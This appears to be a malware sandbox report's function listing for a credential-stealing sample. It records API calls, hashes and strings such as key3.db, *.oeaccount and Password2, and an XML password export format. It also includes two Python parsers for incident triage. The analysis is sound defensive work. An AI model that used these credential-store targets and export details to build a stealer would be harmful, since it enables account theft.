• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
• String ID: <%s>%s</%s>$</item>$<item>
• API String ID: 3337535707-2769808009
• Opcode ID: b0ab3c576635bf4da161b26e96517a42775f10b149b223ac01af6493df536d2f
• Instruction ID: b3463478cabe4832a9b1b799bbf2f925c18d395200ae258af25e9b21d14a16f2
• Opcode Fuzzy Hash: b0ab3c576635bf4da161b26e96517a42775f10b149b223ac01af6493df536d2f
• Instruction Fuzzy Hash: 3611BF31600225BFEB11AF64CC42F957B64FF04318F10406AF509265A2DB7ABD70DB89
Uniqueness

Uniqueness Score: -1.00%
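The function above writes one `<item>` per recovered record and formats each field with sprintf as `<%s>%s</%s>`, the field name having been copied and lowercased by the `_mbscpy`/`_strlwr` subcall. That is the XML-style export of the embedded password recovery tool, and it is the file an incident responder ends up holding when the dump or the dropped output is recovered. The following is an added example, not code from the report or the sample: a tolerant parser for that `<item>` format plus a per-host summary of which accounts were exposed. The report lists no escaping routine among the APIs, so the parser assumes (an assumption, not something the report establishes) that values may contain raw `<` or `&` and therefore avoids a strict XML parser, which rejects such input. The field names (`url`, `user_name`, `password`) and the sample export are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List
from urllib.parse import urlparse

# One record per <item>...</item>; field tags inside are <name>value</name>.
ITEM_RE = re.compile(r"<item>(.*?)</item>", re.S)
# Backreference \1 forces the closing tag to match the opening one, so a raw '<'
# inside a value cannot be mistaken for the end of the field.
FIELD_RE = re.compile(r"<([A-Za-z0-9_]+)>(.*?)</\1>", re.S)

# Constructed sample export (hypothetical field names; values are invented).
SAMPLE_EXPORT = """<?xml version="1.0" ?>
<passwords>
<item>
<url>https://mail.example.com/login</url>
<user_name>alice</user_name>
<password>p<ss&word!</password>
</item>
<item>
<url>https://mail.example.com/login</url>
<user_name>bob</user_name>
<password>hunter2</password>
</item>
<item>
<url>https://intranet.example.net/</url>
<user_name>alice</user_name>
<password></password>
</item>
</passwords>
"""


def parse_items(text: str) -> List[Dict[str, str]]:
    """Extract every <item> block as a dict of lowercased field name -> raw value."""
    records = []
    for item in ITEM_RE.finditer(text):
        fields = {}
        for field in FIELD_RE.finditer(item.group(1)):
            fields[field.group(1).lower()] = field.group(2)
        records.append(fields)
    return records


def summarize_exposure(records: List[Dict[str, str]],
                       url_field: str = "url",
                       user_field: str = "user_name") -> Dict[str, List[str]]:
    """Group exposed usernames by hostname so the services needing resets are obvious."""
    exposed: Dict[str, set] = {}
    for rec in records:
        url = rec.get(url_field, "")
        host = urlparse(url).hostname or url or "(unknown)"
        exposed.setdefault(host, set()).add(rec.get(user_field, ""))
    return {host: sorted(users) for host, users in exposed.items()}


def strict_xml_parse_ok(text: str) -> bool:
    """True if a strict XML parser accepts the export; False when unescaped values break it."""
    try:
        ET.fromstring(text)
        return True
    except ET.ParseError:
        return False


if __name__ == "__main__":
    recs = parse_items(SAMPLE_EXPORT)
    print("strict XML parse succeeds:", strict_xml_parse_ok(SAMPLE_EXPORT))
    for host, users in summarize_exposure(recs).items():
        print(host, users)
```

Feed `parse_items` the recovered export (or the relevant region of the memory dump decoded as text); `summarize_exposure` gives the host-to-accounts map that drives credential resets, and `strict_xml_parse_ok` shows why a standard XML library is the wrong tool for this output.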

APIs
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: _mbscat$memsetsprintf
• String ID:
• API String ID: 125969286-0
• Opcode ID: cfc2cdd9402285d373237ff41ddaadf9cb54e449d46b0907ea735e806236394e
• Instruction ID: 1eb43bd5b8120d09ab0b11fdee56c07fa856cfecb869048c22175c4298d2535e
• Opcode Fuzzy Hash: cfc2cdd9402285d373237ff41ddaadf9cb54e449d46b0907ea735e806236394e
• Instruction Fuzzy Hash: EF014C32D0826436F72156159C03BBB77A89B85704F10407FFD44A92C1EEBCE984479A
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetParent.USER32(?), ref: 00408E33
• GetWindowRect.USER32(?,?), ref: 00408E40
• GetClientRect.USER32(00000000,?), ref: 00408E4B
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00408E5B
• SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00408E77
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: Window$Rect$ClientParentPoints
• String ID:
• API String ID: 4247780290-0
• Opcode ID: 06bcd35f29f4ad8b1f8be6fafa23155ea8198cc34ea2cee51d518efb77a86cea
• Instruction ID: d5d25afb3259b03ed1d628add5c616d0d22dc24c96253af88726d5856d44a725
• Opcode Fuzzy Hash: 06bcd35f29f4ad8b1f8be6fafa23155ea8198cc34ea2cee51d518efb77a86cea
• Instruction Fuzzy Hash: 0E01653680052ABBDB11ABA59C49EFFBFBCFF06750F04402AFD05A2181D77895018BA5
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B70C
                                                                                                                                                                                                            • Part of subcall function 00406A00: LoadCursorA.USER32(00000000,00007F02), ref: 00406A07
                                                                                                                                                                                                            • Part of subcall function 00406A00: SetCursor.USER32(00000000), ref: 00406A0E
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B72F
                                                                                                                                                                                                            • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B684
                                                                                                                                                                                                            • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B6AE
                                                                                                                                                                                                            • Part of subcall function 0040B65E: _mbscat.MSVCRT ref: 0040B6C1
                                                                                                                                                                                                            • Part of subcall function 0040B65E: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
                                                                                                                                                                                                          • SetCursor.USER32(?,?,0040C8F2), ref: 0040B754
                                                                                                                                                                                                          • SetFocus.USER32(?,?,?,0040C8F2), ref: 0040B766
                                                                                                                                                                                                          • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040B77D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2374668499-0
                                                                                                                                                                                                          • Opcode ID: 53ade561a914af880d1e6a05375d4a59a2fac5c4dfd76dfdfba0808ab67976fb
                                                                                                                                                                                                          • Instruction ID: 612281c0e7bcc4a6d3b4da52a7b96f70e992a4283d6ab6b50bd9db3d0aad170a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53ade561a914af880d1e6a05375d4a59a2fac5c4dfd76dfdfba0808ab67976fb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 120129B5200A00EFD726AB75CC85FA6B7E9FF48315F0604B9F1199B272CA726D018F14
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040AAB7
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040AACD
                                                                                                                                                                                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                            • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                                                                            • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040AB04
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • <%s>, xrefs: 0040AAFE
                                                                                                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AAD2
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                                          • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                          • API String ID: 3699762281-1998499579
                                                                                                                                                                                                          • Opcode ID: d5ee42966936a1138623645e18684dfcccb61381e14bbb228212885f4d89bd19
                                                                                                                                                                                                          • Instruction ID: a3dff73391336119dc4caae329f843e57b3ce466119e41e431a2bb454e721b3a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5ee42966936a1138623645e18684dfcccb61381e14bbb228212885f4d89bd19
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED01F7729401296AEB20B655CC45FDA7A6CAF45305F0400BAB509B2182DBB49E548BA5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%
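
Each block in this section is one Joe Sandbox per-function record: direct API calls with their call-site refs, calls reached through "Part of subcall function" lines, embedded strings with xrefs, the memory-dump source, and the similarity hashes. When triaging a report this long it helps to have those records as data, for instance to find every function that embeds the `<?xml version="1.0" encoding="ISO-8859-1" ?>` header and `<%s>` tag formatter seen in the entry above (the write path behind the mail/browser credential export flagged in the signatures), or to list which modules the dumped code at 00400000 reaches. The parser below is an added example, not Joe Sandbox's own code. Its `SAMPLE` input is constructed: two entries copied from this page and trimmed, one of them the edge case with no listed APIs. The record fields and helper names (`parse_entries`, `entries_with_string`, `apis_by_module`) are this example's own.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample: two entries from this report, trimmed to the parsed lines.
SAMPLE = """\
APIs
• memset.MSVCRT ref: 0040AAB7
• memset.MSVCRT ref: 0040AACD
  • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
  • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
  • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
  • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
• sprintf.MSVCRT ref: 0040AB04
Strings
• <%s>, xrefs: 0040AAFE
• <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AAD2
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
• String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
Uniqueness
Uniqueness Score: -1.00%
APIs
Similarity
• API ID: ??3@
• String ID:
Uniqueness
Uniqueness Score: -1.00%
"""

# name.MODULE(args), ref: ADDR   or   name.MODULE ref: ADDR
API_RE = re.compile(r"^(?P<name>[^.(]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<fn>[0-9A-Fa-f]+): (?P<rest>.*)$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<xref>[0-9A-Fa-f]+)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str                       # call-site address
    subcall_of: str | None = None  # caller when listed as "Part of subcall function"

@dataclass
class FunctionEntry:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, str]] = field(default_factory=list)  # (text, xref)
    meta: dict[str, str] = field(default_factory=dict)           # Source File, Offset, API ID, ...
    uniqueness: str | None = None

    @property
    def address(self) -> str | None:  # lowest direct call-site ref labels the function
        return min((a.ref for a in self.apis if a.subcall_of is None), default=None)

def parse_api_line(body: str) -> ApiCall | None:
    caller = None
    if m := SUBCALL_RE.match(body):
        caller, body = m["fn"], m["rest"]
    if not (m := API_RE.match(body)):
        return None
    return ApiCall(m["name"], m["module"], [a for a in (m["args"] or "").split(",") if a], m["ref"], caller)

def parse_entries(text: str) -> list[FunctionEntry]:
    entries: list[FunctionEntry] = []
    cur, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":            # every entry opens with its APIs header
            cur, section = FunctionEntry(), "APIs"
            entries.append(cur)
        elif not line or cur is None:
            continue
        elif line in SECTIONS:
            section = line
        elif line.startswith("Uniqueness Score:"):
            cur.uniqueness = line.split(":", 1)[1].strip()
        else:
            body = line.lstrip("•").strip()
            if section == "APIs":
                if call := parse_api_line(body):
                    cur.apis.append(call)
            elif section == "Strings":
                if m := STRING_RE.match(body):
                    cur.strings.append((m["text"], m["xref"]))
            else:  # "Key: value" pairs; Memory Dump Source joins several with ", "
                for part in body.split(", ") if section == "Memory Dump Source" else [body]:
                    key, _, value = part.partition(":")
                    cur.meta[key.strip()] = value.strip()
    return entries

def entries_with_string(entries: list[FunctionEntry], needle: str) -> list[FunctionEntry]:
    """Pivot: which functions embed a given string (e.g. the XML export header)."""
    return [e for e in entries if any(needle in s for s, _ in e.strings)]

def apis_by_module(entries: list[FunctionEntry]) -> dict[str, set[str]]:
    """Module -> API names reached by any entry, subcalls included."""
    out: dict[str, set[str]] = {}
    for a in (a for e in entries for a in e.apis):
        out.setdefault(a.module, set()).add(a.name)
    return out

if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for e in entries_with_string(parsed, "<?xml"):
        print(e.address, e.meta["API ID"], [a.name for a in e.apis])
    print(apis_by_module(parsed))
```

Feed it the report text as saved from the page (indentation is irrelevant, the parser strips it) and pivot on `strings`, `meta["Opcode ID"]` or `meta["Instruction Fuzzy Hash"]` to match functions against other reports of the same family. Entries without listed APIs, such as the destructor-only `??3@` record, parse to an empty call list and `address is None` rather than being skipped, so counts stay honest.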

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                          • Opcode ID: 7a9d4f54567c0a48d1859bf8158ae1996b1b95a3d5575a953b4da3af230d69c1
                                                                                                                                                                                                          • Instruction ID: ea629a9aafeff6281071dae141f51b3a8c797cef86d835f03ce988520f4efe7f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a9d4f54567c0a48d1859bf8158ae1996b1b95a3d5575a953b4da3af230d69c1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94F0FF73609B01DBD7209FA99AC065BF7E9AB48724BA4093FF149D3642C738BC54C618
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409820
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409833
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409846
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409859
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040986D
                                                                                                                                                                                                            • Part of subcall function 004077E4: ??3@YAXPAX@Z.MSVCRT ref: 004077EB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                          • Opcode ID: d9c01388865c204718a59a81bbac89ec1da5725ce67048d786a5844de5934490
                                                                                                                                                                                                          • Instruction ID: 7a7d368fa20b86f0ae4ccc19201ff918d3b0396c1b4e5cf9e7c68f971a3fafa8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9c01388865c204718a59a81bbac89ec1da5725ce67048d786a5844de5934490
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29F03633D1A930D7C6257B66500164EE3686E86B3931942AFF9047B7D28F3C7C5485DE
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406EA5: memset.MSVCRT ref: 00406EC5
                                                                                                                                                                                                            • Part of subcall function 00406EA5: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406ED8
                                                                                                                                                                                                            • Part of subcall function 00406EA5: _strcmpi.MSVCRT ref: 00406EEA
                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00410113
                                                                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 0041011B
                                                                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00410125
                                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 00410133
                                                                                                                                                                                                          • GetSysColorBrush.USER32(00000005), ref: 0041013B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2775283111-0
                                                                                                                                                                                                          • Opcode ID: 627087e029a1abcb04561e415bb5884c82ccbbb1204662b743e4c0e852913d63
                                                                                                                                                                                                          • Instruction ID: 15b5804eddbfc7b45e8a586a0394ac07707e7803bdc14c23b44bbc646b24dc1f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 627087e029a1abcb04561e415bb5884c82ccbbb1204662b743e4c0e852913d63
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7DF0F935100508BBDF116FA5DC09EDE3B25FF05711F10813AFA15585B1CBFAD9A09B58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • BeginDeferWindowPos.USER32(0000000A), ref: 00405F44
    • Part of subcall function 004015F3: GetDlgItem.USER32(?,?), ref: 00401603
    • Part of subcall function 004015F3: GetClientRect.USER32(?,?), ref: 00401615
    • Part of subcall function 004015F3: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 0040167F
  • EndDeferWindowPos.USER32(?), ref: 00406003
  • InvalidateRect.USER32(?,?,00000001), ref: 0040600E
Strings
Memory Dump Source
  • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
  • API ID: DeferWindow$Rect$BeginClientInvalidateItem
  • String ID: $
  • API String ID: 2498372239-3993045852
  • Opcode ID: 4f29eeeafaf0275d54e1a8ac864168a2c968bf72d4383311267dcf3585429308
  • Instruction ID: 00843a31076853278f863d8e49a3b1dedc6e53575b175ed212c8a3462f8966d2
  • Opcode Fuzzy Hash: 4f29eeeafaf0275d54e1a8ac864168a2c968bf72d4383311267dcf3585429308
  • Instruction Fuzzy Hash: 4D318F70640259BFEF229B52DC89D6F3A7CFBC5B88F10006DF401792A1CA794F51EA69
Uniqueness

Uniqueness Score: -1.00%

APIs
    • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
  • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,C@,004069F3,00000000,?,?,00000000), ref: 0040688C
  • CloseHandle.KERNEL32(?), ref: 004068B2
    • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
    • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
    • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
Strings
Memory Dump Source
  • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
  • API ID: File$??2@??3@CloseCreateHandleReadSize
  • String ID: C@$key3.db
  • API String ID: 1968906679-1993167907
  • Opcode ID: 8070846350ac793f35cf726ef4b9da8142e130784681131c85812774ce581970
  • Instruction ID: 0ede60c3f523747ec885d841e26685764e9001b1461c3323211a21065397dc39
  • Opcode Fuzzy Hash: 8070846350ac793f35cf726ef4b9da8142e130784681131c85812774ce581970
  • Instruction Fuzzy Hash: 9811D3B2D00514AFDB10AF19CC4588E7BA5EF46360B12807BF80AAB291DB34DD60CB98
Uniqueness

Uniqueness Score: -1.00%

APIs
  • memset.MSVCRT ref: 0040BFE7
  • SetFocus.USER32(?,?), ref: 0040C06F
    • Part of subcall function 0040BFB1: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040BFC0
Strings
Memory Dump Source
  • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
  • API ID: FocusMessagePostmemset
  • String ID: +_@$l
  • API String ID: 3436799508-640399337
  • Opcode ID: 5d19dabe06c04104d03c805a20db61bb7ad0843c3c7d2444441ab514d0ecd962
  • Instruction ID: dfa99e5f235914639cafa3f1faff2c73f9381d0964b1719e4b49f1177e3774cc
  • Opcode Fuzzy Hash: 5d19dabe06c04104d03c805a20db61bb7ad0843c3c7d2444441ab514d0ecd962
  • Instruction Fuzzy Hash: B411A172904198CBDF209B24CC44BCA7BB9AF90304F0900F5A94C7B2D2C7B55E89CFA9
Uniqueness

Uniqueness Score: -1.00%

APIs
    • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
    • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
  • CreateFontIndirectA.GDI32(?), ref: 0040101F
  • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
  • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
Strings
Memory Dump Source
  • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
  • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
  • String ID: MS Sans Serif
  • API String ID: 3492281209-168460110
  • Opcode ID: 2b978f582ba89fecee05bf5e4b747a5653f5ca03fd4d42c103354d0125bbd5b3
  • Instruction ID: 91d7546927304a6081eb6d9f577e17eac68e9825403057b28fc40c6b5cfff950
  • Opcode Fuzzy Hash: 2b978f582ba89fecee05bf5e4b747a5653f5ca03fd4d42c103354d0125bbd5b3
  • Instruction Fuzzy Hash: 54F0A775A407047BEB3267A0EC47F4A7BACAB41B41F104535F651B51F2D6F4B544CB48
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
  • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
  • API ID: ClassName_strcmpimemset
  • String ID: edit
  • API String ID: 275601554-2167791130
  • Opcode ID: ed2b804169d995c812202dfe57b894f8811318f38427dff4b8ba9102b7fae148
  • Instruction ID: 847e1e856ca93c5331a43762777f09d1dcd0b535ae5450603ebfd434222f9f24
  • Opcode Fuzzy Hash: ed2b804169d995c812202dfe57b894f8811318f38427dff4b8ba9102b7fae148
  • Instruction Fuzzy Hash: A3E09B73C5412E7AEB21B6A4DC01FE6776CEF55705F0000F7B945E10C1E5B45A888B95
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
  • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
  • API ID: strlen$_mbscat
  • String ID: 8D
  • API String ID: 3951308622-2703402624
  • Opcode ID: 0ec1879d80d4c340dda7a3243aeb4a8038102bdf29c15a79d9befc878d316230
  • Instruction ID: fdb3abcae466a204d6f595596d606a7769775cd3d87c53e6d0f7ff6b17e0c5bf
  • Opcode Fuzzy Hash: 0ec1879d80d4c340dda7a3243aeb4a8038102bdf29c15a79d9befc878d316230
  • Instruction Fuzzy Hash: F7D0A73390D62027F6153617BC07D8E5BD1CFD0779B18041FF908D2181DD3E8495909D
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
  • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
  • API ID: _mbscat$_mbscpy
  • String ID: Password2
  • API String ID: 2600922555-1856559283
  • Opcode ID: dd6d1596d5adc5cb59be199e9a5e42366e44826479dad9da6a8aaa41d84d8c14
  • Instruction ID: 284e3ed20e01ed0f985c27cc48ee8d5f57cf04e2e68a318951e5723102309710
  • Opcode Fuzzy Hash: dd6d1596d5adc5cb59be199e9a5e42366e44826479dad9da6a8aaa41d84d8c14
  • Instruction Fuzzy Hash: DFC0126164253032351132152C02ECE5D444D927A9744405BF64871152DE4C092141EE
Uniqueness

Uniqueness Score: -1.00%

APIs
  • LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
Strings
Memory Dump Source
  • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
  • API ID: AddressLibraryLoadProc
  • String ID: SHGetSpecialFolderPathA$shell32.dll
  • API String ID: 2574300362-543337301
  • Opcode ID: 2e6b26bb17626f4397607e962d7e33e0088331342153929cca1aec3e07a9d3dc
  • Instruction ID: 89c53fa068d5e839e9f7b52beb2d5746c1b59f0700db89f23453b1bd6c0da6b7
  • Opcode Fuzzy Hash: 2e6b26bb17626f4397607e962d7e33e0088331342153929cca1aec3e07a9d3dc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31D09EB8A00349EFDB00AF21EC0874639946785756B104436A04591267E6B88091CE5D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                          • String ID: rows deleted
                                                                                                                                                                                                          • API String ID: 2221118986-571615504
